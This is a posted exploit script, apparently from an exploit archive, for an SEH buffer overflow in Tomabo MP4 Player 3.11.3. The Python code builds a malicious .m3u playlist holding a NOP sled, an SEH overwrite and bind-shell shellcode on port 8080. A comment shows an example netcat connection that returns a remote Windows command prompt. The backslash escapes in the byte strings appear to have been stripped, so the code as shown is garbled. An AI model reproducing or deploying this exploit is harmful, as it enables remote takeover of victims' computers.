Tomabo MP4 Player 3.11.3 SEH Buffer Overflow
Posted on 09 August 2015
#!/usr/bin/python # Exploit Title: Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow # Date: 03/08/2015 # Exploit Author: Saeid Atabaki # E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org # Linkedin: https://www.linkedin.com/in/saeidatabaki # Vendor Homepage: http://tomabo.com/mp4-player/index.html # Version: 3.11.3 # Tested on: Windows XP SP3 #---------------------------------------------------------------------# # Badchars: "x00x0ax0dx0cx20x09x1a"' # # nc 192.168.11.136 8080 # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:Documents and SettingsAdministratorDesktop> #---------------------------------------------------------------------# import sys, struct file="crash.m3u" # Windows bind shell port 8080, feel free to swap shellcode sc = "" sc += "xddxc1xd9x74x24xf4xb8xd3x4bxb2xa4x5dx31" sc += "xc9xb1x53x31x45x17x83xc5x04x03x96x58x50" sc += "x51xe4xb7x16x9ax14x48x77x12xf1x79xb7x40" sc += "x72x29x07x02xd6xc6xecx46xc2x5dx80x4exe5" sc += "xd6x2fxa9xc8xe7x1cx89x4bx64x5fxdexabx55" sc += "x90x13xaax92xcdxdexfex4bx99x4dxeexf8xd7" sc += "x4dx85xb3xf6xd5x7ax03xf8xf4x2dx1fxa3xd6" sc += "xccxccxdfx5exd6x11xe5x29x6dxe1x91xabxa7" sc += "x3bx59x07x86xf3xa8x59xcfx34x53x2cx39x47" sc += "xeex37xfex35x34xbdxe4x9exbfx65xc0x1fx13" sc += "xf3x83x2cxd8x77xcbx30xdfx54x60x4cx54x5b" sc += "xa6xc4x2ex78x62x8cxf5xe1x33x68x5bx1dx23" sc += "xd3x04xbbx28xfex51xb6x73x97x96xfbx8bx67" sc += "xb1x8cxf8x55x1ex27x96xd5xd7xe1x61x19xc2" sc += "x56xfdxe4xedxa6xd4x22xb9xf6x4ex82xc2x9c" sc += "x8ex2bx17x08x86x8axc8x2fx6bx6cxb9xefxc3" sc += "x05xd3xffx3cx35xdcxd5x55xdex21xd6x46x8f" sc += "xafx30x12xbfxf9xebx8ax7dxdex23x2dx7dx34" sc += "x1cxd9x36x5ex9bxe6xc6x74x8bx70x4dx9bx0f" sc += "x61x52xb6x27xf6xc5x4cxa6xb5x74x50xe3x2d" sc += "x14xc3x68xadx53xf8x26xfax34xcex3ex6exa9" sc += "x69xe9x8cx30xefxd2x14xefxccxddx95x62x68" sc += "xfax85xbax71x46xf1x12x24x10xafxd4x9exd2" sc += "x19x8fx4dxbdxcdx56xbex7ex8bx56xebx08x73" sc += "xe6x42x4dx8cxc7x02x59xf5x35xb3xa6x2cxfe" sc += "xc3xecx6cx57x4cxa9xe5xe5x11x4axd0x2ax2c" sc += "xc9xd0xd2xcbxd1x91xd7x90x55x4axaax89x33" sc += "x6cx19xa9x11" payload = "x90" * 1028 + "xebx18x90x90" + "x69x9ex48x00" + "x90" * 20 + sc writeFile = open (file, "w") writeFile.write( payload ) writeFile.close()
